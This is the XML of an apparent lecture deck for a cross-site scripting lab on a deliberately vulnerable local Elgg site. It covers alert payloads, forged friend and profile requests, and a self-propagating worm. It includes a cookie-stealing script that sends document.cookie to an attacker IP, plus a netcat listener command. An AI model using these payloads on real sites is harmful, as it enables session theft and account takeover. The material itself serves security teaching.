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65" r:id="rId3"/>
    <p:sldId id="307" r:id="rId4"/>
    <p:sldId id="291" r:id="rId5"/>
    <p:sldId id="308" r:id="rId6"/>
    <p:sldId id="292" r:id="rId7"/>
    <p:sldId id="293" r:id="rId8"/>
    <p:sldId id="294" r:id="rId9"/>
    <p:sldId id="309" r:id="rId10"/>
    <p:sldId id="299" r:id="rId11"/>
    <p:sldId id="295" r:id="rId12"/>
    <p:sldId id="296" r:id="rId13"/>
    <p:sldId id="310" r:id="rId14"/>
    <p:sldId id="300" r:id="rId15"/>
    <p:sldId id="298" r:id="rId16"/>
    <p:sldId id="311" r:id="rId17"/>
    <p:sldId id="301" r:id="rId18"/>
    <p:sldId id="312" r:id="rId19"/>
    <p:sldId id="313" r:id="rId20"/>
    <p:sldId id="314" r:id="rId21"/>
    <p:sldId id="315" r:id="rId22"/>
    <p:sldId id="302" r:id="rId23"/>
    <p:sldId id="303" r:id="rId24"/>
    <p:sldId id="306" r:id="rId25"/>
    <p:sldId id="305" r:id="rId26"/>
    <p:sldId id="316" r:id="rId27"/>
    <p:sldId id="318" r:id="rId28"/>
    <p:sldId id="304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3" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="79" d="100"/>
          <a:sy n="79" d="100"/>
        </p:scale>
        <p:origin x="-512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532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51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94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83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55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rflabelgg.com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34956" y="1170778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4800" dirty="0"/>
              <a:t>Cross-Site Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="4800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" dirty="0" smtClean="0"/>
              <a:t>(XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Becoming the Victim’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Friend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2444"/>
            <a:ext cx="8520600" cy="3496431"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Open HTTP Headers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Live</a:t>
            </a:r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/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Log into Charlie’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Elgg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 Add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to friend list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Find the corresponding HTTP request in HTTP Header Live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4" y="1443877"/>
            <a:ext cx="5900393" cy="23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Request for Adding Friends(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Elgg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0"/>
            <a:ext cx="9144000" cy="19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8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URL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7700"/>
            <a:ext cx="9144000" cy="13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3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the Ajax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20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3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Attack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463" y="1233174"/>
            <a:ext cx="4270349" cy="3496431"/>
          </a:xfrm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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack’s Account</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="3366FF"/>
              </a:solidFill>
            </a:endParaRP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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Elgg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> account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Go to Profile, click “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Edit HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” to enter the plaintext mode (we cannot use the rich text mode), then inject malicious code into the “About me” text field.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>out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61112" y="1240915"/>
            <a:ext cx="4270349" cy="3496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Victim’s Account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Alice’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Elgg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> account, check friend list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Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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Check friend list again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181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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modifying the Victim’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Profile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77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5: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modifying the Victim’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Profile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/>
              <a:t>&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;Insert to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> “About Me” field (text  mode)&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;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68778"/>
            <a:ext cx="8520600" cy="3200097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" name="Picture 3" descr="Screen Shot 2018-10-28 at 4.52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777"/>
            <a:ext cx="7393010" cy="1875957"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2018-10-28 at 4.53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8490"/>
            <a:ext cx="6702778" cy="200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34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Modifying the Victim’s Profile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5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3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5: Modifying the Victim’s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2444"/>
            <a:ext cx="8520600" cy="3496431"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Open HTTP Headers Live</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Log into Charlie’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Elgg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Modify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Profile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Find the corresponding HTTP request in HTTP Header Live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6" y="2577235"/>
            <a:ext cx="3826413" cy="21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3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52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38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Environment Setup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/>
              <a:t> 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15012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Elgg: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>open-source web application for social networking with disabled countermeasures for XSS.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-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Elgg website : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.xsslabelgg.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="4572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800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The website is hosted on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> via Apache’s Virtual Hosting</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1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496" y="3002237"/>
            <a:ext cx="7421125" cy="11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the URL and Payload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436"/>
            <a:ext cx="9144000" cy="37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0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 out the POST Request using Ajax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200"/>
            <a:ext cx="9144000" cy="24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2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Attack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68" y="1072445"/>
            <a:ext cx="4495431" cy="2881622"/>
          </a:xfrm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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack’s Account</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="3366FF"/>
              </a:solidFill>
            </a:endParaRP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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Elgg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> account</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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Go to Profile, click “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Edit HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” to enter the plaintext mode (we cannot use the rich text mode), then inject malicious code into “About Me” text field.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>out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60300" y="1080184"/>
            <a:ext cx="4495431" cy="3496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Victim’s Account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Alice’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Elgg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> account, check Alice’s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Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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check Alice’s profile again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out</a:t>
            </a:r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5101" y="4327018"/>
            <a:ext cx="3892860" cy="687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Clean Up Accounts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219796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  <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>6: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Writing a Self-Propagating XSS Worm </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Shape 20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1375" y="1143550"/>
            <a:ext cx="7641949" cy="3820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56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Self-Propagation XSS Worm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1366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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> worm, not only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>will the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>visitors of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> profile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>be modified, their profiles can also be made to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>carry a copy of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>code. So</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, when an infected profile was viewed by others, the code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>further spread.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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Challenges: How can JavaScript code produce a copy of itself?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wo typical approaches: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u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM approach: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript code can get a copy of itself directly from DOM via DOM APIs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u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Link approach: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JavaScript code can be included in a web page via a link using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attribute of the script tag.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="364790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Get a Copy of Self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28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9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68" y="236070"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Write a Self-Propagating XSS Worm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9" y="932767"/>
            <a:ext cx="6416222" cy="40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3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Do the Attack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68" y="1072445"/>
            <a:ext cx="4495431" cy="2881622"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack’s Account</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="3366FF"/>
              </a:solidFill>
            </a:endParaRP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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Elgg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> account</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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Go to Profile, click “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Edit HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” to enter the plaintext mode (we cannot use the rich text mode), then inject malicious code into “About Me” text field.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>out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31681" y="533687"/>
            <a:ext cx="4495431" cy="2311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Victim Alice’s Account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Alice’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Elgg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> account, check Alice’s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Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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check Alice’s profile again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out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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255101" y="4327018"/>
            <a:ext cx="3892860" cy="68789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Clean Up Accounts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555467" y="2711332"/>
            <a:ext cx="4495431" cy="231131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/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In Victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Boby’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Account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into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Boby’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Elgg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> account, check his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Visit Alice’s profile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check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Boby’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> profile again</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Log out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2792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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: Countermeasures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072444"/>
            <a:ext cx="8520600" cy="3496431"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>See lab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3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2-23 at 2.41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1" y="0"/>
            <a:ext cx="55136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5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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Posting a Malicious Message to Display an Alert Window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1111"/>
            <a:ext cx="8520600" cy="3157764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&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;Insert to the below code to your profile&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Short message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&lt;script&gt;alert(’XSS’);&lt;/script&gt;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Long message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&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript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="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com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myscripts.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;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/script&gt;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Steps: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> injects to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’s account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Log into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Elgg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> account and go to profile page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Inject a script into the profile’s “Brief description” field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert(’XSS’);&lt;/script&gt;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Log out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Log into Alice’s account and go to the “Members” Tab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Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> profile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 smtClean="0"/>
              <a:t>Log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4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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Posting a Malicious Message to Display Cookies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1111"/>
            <a:ext cx="8520600" cy="3157764"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;Insert to the below code to your profile&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;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script&gt;alert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document.cookie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;&lt;/script&gt;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4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3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stealing Cookies from the Victim’s Machine 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11111"/>
            <a:ext cx="8520600" cy="3157764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&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;Insert to the below code to your profile&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker’s machine ( listening): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc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l 5555 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>v</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Victim’s machine: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script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(’&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>img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=http://10.1.2.5:5555?c=’ + escape(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) + ’ &gt;’);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/script&gt;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32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78" y="191025"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Task 4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Becoming the Victim’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Friend</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Screen Shot 2019-02-25 at 8.35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" y="1349362"/>
